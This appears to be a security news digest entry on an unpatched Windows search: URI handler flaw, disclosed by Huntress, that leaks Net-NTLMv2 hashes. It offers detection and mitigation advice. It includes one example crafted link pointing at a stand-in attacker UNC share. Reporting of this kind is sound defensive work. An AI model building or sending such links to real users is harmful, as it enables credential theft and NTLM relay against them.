Last updated: July 5, 2026 at 9:01 AM UTC
All 557 Vulnerability 199 Breach 106 Threat 245 Defense 7
Tag: ntlm (1 article)Clear

Unpatched Windows search: URI handler leaks NTLMv2 hashes via crafted crumb=location UNC path - same class as patched Snipping Tool flaw

Huntress has disclosed an unpatched Windows vulnerability in the search: URI handler that can leak a user's NTLMv2 hash to an attacker. It mirrors CVE-2026-33829 - the Snipping Tool ms-screensketch: handler flaw Microsoft patched in April - achieving the same end via search:query and crumb=location: parameters pointing at an attacker UNC path (for example, search:query=test&crumb=location:\\attacker\share). If the user approves launching the crafted link from a web page or email, Windows connects to the attacker's SMB server and discloses the Net-NTLMv2 hash, which can be relayed or cracked to authenticate as the user. No patch is currently available; defenders should block outbound SMB and apply Huntress mitigations.

Check
Hunt for processes launching search: URIs with crumb=location pointing at UNC paths. Monitor outbound SMB (TCP 445) to external hosts. Educate users against approving search: link prompts.
Affected
Windows systems with the unpatched search: URI handler. A crafted link in a web page or email, once approved, forces an SMB connection that discloses the user's Net-NTLMv2 hash.
Fix
Block outbound SMB (TCP 445 and 139) at the perimeter. Enforce SMB signing and NTLM relay protections. Apply Huntress mitigations and disable the search: handler where feasible pending a patch.